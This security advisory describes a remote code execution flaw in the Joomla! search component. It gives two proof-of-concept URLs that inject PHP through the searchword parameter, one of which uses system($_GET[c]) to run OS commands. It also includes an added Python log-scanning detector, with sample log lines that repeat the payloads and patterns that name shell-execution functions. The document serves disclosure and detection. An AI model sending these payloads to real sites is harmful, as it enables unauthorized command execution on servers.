Joomla! is "an award-winning Content Management System (CMS) that will help you build websites and other powerful online applications. Best of all, Joomla! is an open source solution that is freely available to everybody. Joomla! is used all over the world to power everything from simple, personal homepages to complex corporate web applications". The search component of Joomla! (com_search) allows an attacker to execute arbitrary PHP code, for example OS commands via system() calls. This works with PHP configured as recommended by the Joomla! installer.
Credit:
The information has been provided by Johannes Greil / SEC Consult.
The value of the "searchword" parameter is passed to the eval() code mentioned above and executed. An attacker can append further PHP statements after the "echo" language construct, which can then be used for OS command execution.
To bypass the search word length limit of 20 characters, a separate GET parameter is used to carry the OS command (see proof of concept).
Proof of concept:
http://$joomlahost/index.php?searchword=";phpinfo();%23&option=com_search&Itemid=1
http://$joomlahost/index.php?c=id&searchword=";system($_GET[c]);%23&option=com_search&Itemid=1
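A log-based detection check for this issue, added here as an example and not part of the original advisory or of Joomla!: it scans constructed web-server log lines (not real traffic) for com_search requests whose searchword carries PHP syntax rather than a search term, and records any extra GET parameters of the kind used to get the OS command past the 20-character limit. The combined log format, the indicator names and the list of expected parameters are assumptions.

```python
import re
from urllib.parse import unquote_plus
# Constructed sample access-log lines (combined format; not taken from any real server).
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /index.php?searchword=joomla+templates&option=com_search&Itemid=1 HTTP/1.1" 200 5120
10.0.0.9 - - [01/Jan/2024:10:00:01 +0000] "GET /index.php?searchword=%22;phpinfo();%23&option=com_search&Itemid=1 HTTP/1.1" 200 40210
10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /index.php?c=id&searchword=%22;system($_GET[c]);%23&option=com_search&Itemid=1 HTTP/1.1" 200 310
10.0.0.7 - - [01/Jan/2024:10:00:03 +0000] "GET /index.php?option=com_content&view=article&id=3 HTTP/1.1" 200 8800
"""
LOG_RE = re.compile(r'^(?P<client>\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')
# Signs that a search term is a PHP fragment: closing the echo string literal and ending the
# statement ("; ), calling a function, reading a superglobal, commenting out the rest (# / %23).
INDICATORS = {
    "string_break": re.compile(r'["\'];'),
    "php_call": re.compile(r'\b(?:system|exec|passthru|shell_exec|phpinfo|eval)\s*\('),
    "superglobal": re.compile(r'\$_(?:GET|POST|REQUEST|COOKIE)\b'),
    "trailing_comment": re.compile(r'#\s*$|/\*'),
}
EXPECTED_PARAMS = {"searchword", "option", "Itemid"}  # anything else may carry the command

def parse_query(target):
    """Split the query on '&' only, so a ';' inside a payload stays part of its value."""
    params = {}
    for pair in filter(None, target.partition("?")[2].split("&")):
        key, _, value = pair.partition("=")
        params[unquote_plus(key)] = unquote_plus(value)
    return params

def inspect_target(target):
    """Return indicators and unexpected parameters for a suspicious com_search request, else None."""
    params = parse_query(target)
    if params.get("option") != "com_search" or "searchword" not in params:
        return None
    hits = sorted(name for name, rx in INDICATORS.items() if rx.search(params["searchword"]))
    if not hits or hits == ["trailing_comment"]:  # a lone '#' (e.g. "C#") is not worth an alert
        return None
    return {"searchword": params["searchword"], "indicators": hits,
            "extra_params": sorted(set(params) - EXPECTED_PARAMS)}

def scan_log(text):
    """Return one finding per suspicious com_search request found in the log text."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        finding = inspect_target(m.group("target")) if m else None
        if finding:
            finding["client"] = m.group("client")
            findings.append(finding)
    return findings
```

On the constructed log above, scan_log(SAMPLE_LOG) reports the two payload requests from 10.0.0.9 and ignores the ordinary search and the com_content request.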